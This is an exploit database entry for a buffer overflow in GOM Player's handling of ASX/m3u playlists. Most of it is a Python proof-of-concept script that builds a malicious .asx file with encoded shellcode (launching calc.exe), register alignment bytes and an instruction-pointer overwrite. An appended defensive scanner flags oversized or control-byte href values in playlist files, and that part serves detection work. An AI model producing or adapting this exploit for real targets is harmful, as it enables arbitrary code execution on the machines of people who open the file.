GOM-Player

2012-01-21T00:00:00
ID EXPLOITPACK:E3FCFFD66D6F55F78D45A21ADDA97DAD
Type exploitpack
Reporter Debasish
Modified 2012-01-21T00:00:00

Description

An error occurs when the player handles a response from the m3u playlist, and this error leads to a buffer overflow. The exploit is unstable and should only be used as a PoC. Once the list is imported, the player triggers the buffer overflow.

                                        
raw_input("[*] Press Enter to generate the crafted ASX...")
size = 2046
#Shellcode WinExec "Calc.exe" Unicode
shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI"
shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl"
shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8"
shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4"
shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li"
shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN"
shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu"
shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA"
buff = ''
buff += '<asx version = "3.0" ><entry><title>ArirangTV</title><ref href = "WWW.'
align = "A"                 # align to first instruction
align += "\x55\x41\x58\x41" # push ebp, pop eax
align += "\x05\x11\x11"     # add eax,11001100
align += "\x41"             # align
align += "\x2d\x10\x11"     # sub eax,11001000
align += "\x41" * 109       # padding
align += "\x40\x41\x40"     # 2x inc eax
align += "\x41"             # align
buff += align
buff += shellcode
buff += "\x41"*(size - len(align) - len(shellcode))
#eip
buff += "\xd9\x57"          # CALL EBP - 0x005700d9
                            # top of the stack
buff += "\x46"*2
buff += "\x47"*100
buff +='"/></entry></asx>'
f = open('exploits/code/output/exploit.asx','w')
f.write(buff)
f.close()
print "[*] Crafted .asx file generated"
#print "[*] Exit"
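
For triage of playlist files before they reach a media player, the following added example (not part of the original exploit entry) flags ASX `href` attributes that are oversized or contain control bytes, the two structural traits of the file the script above writes, and also flags values whose closing quote is missing. The 1024-byte threshold, the function name and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumed threshold: legitimate stream URLs rarely approach this length.
MAX_HREF_LEN = 1024

# ASX is XML-like but case-insensitive and often malformed, so match href
# attributes with a tolerant regex instead of a strict XML parser.
HREF_RE = re.compile(rb'<\s*(\w+)\b[^>]*?\bhref\s*=\s*"([^"]*)("?)', re.I)
# Control bytes have no place in a URL (tab, CR and LF are tolerated).
CONTROL_RE = re.compile(rb'[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]')


def scan_asx(data, max_len=MAX_HREF_LEN):
    """Return [(tag, href_length, reasons)] for suspicious href values in raw ASX bytes."""
    findings = []
    for m in HREF_RE.finditer(data):
        tag = m.group(1).decode("ascii", "replace").lower()
        value, closing = m.group(2), m.group(3)
        reasons = []
        if len(value) > max_len:
            reasons.append("oversized")
        if CONTROL_RE.search(value):
            reasons.append("control-bytes")
        if not closing:
            reasons.append("unterminated")
        if reasons:
            findings.append((tag, len(value), reasons))
    return findings


# Constructed sample inputs (filler bytes only, no payload).
BENIGN = (b'<asx version="3.0"><entry><title>Radio</title>'
          b'<ref href="http://media.example/stream.asf"/></entry></asx>')
OVERSIZED = (b'<asx version = "3.0" ><entry><title>t</title><ref href = "WWW.'
             + b"A" * 2300 + b'"/></entry></asx>')
CONTROL = b'<ASX><ENTRY><REF HREF="http://media.example/\x05\x11a.asf"/></ENTRY></ASX>'
UNTERMINATED = b'<asx><entry><ref href="http://media.example/a.asf'

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("oversized", OVERSIZED),
                         ("control", CONTROL), ("unterminated", UNTERMINATED)]:
        print(name, scan_asx(sample))
```

Read candidate files in binary mode (`open(path, "rb").read()`) so raw bytes in the attribute are preserved for the control-byte check.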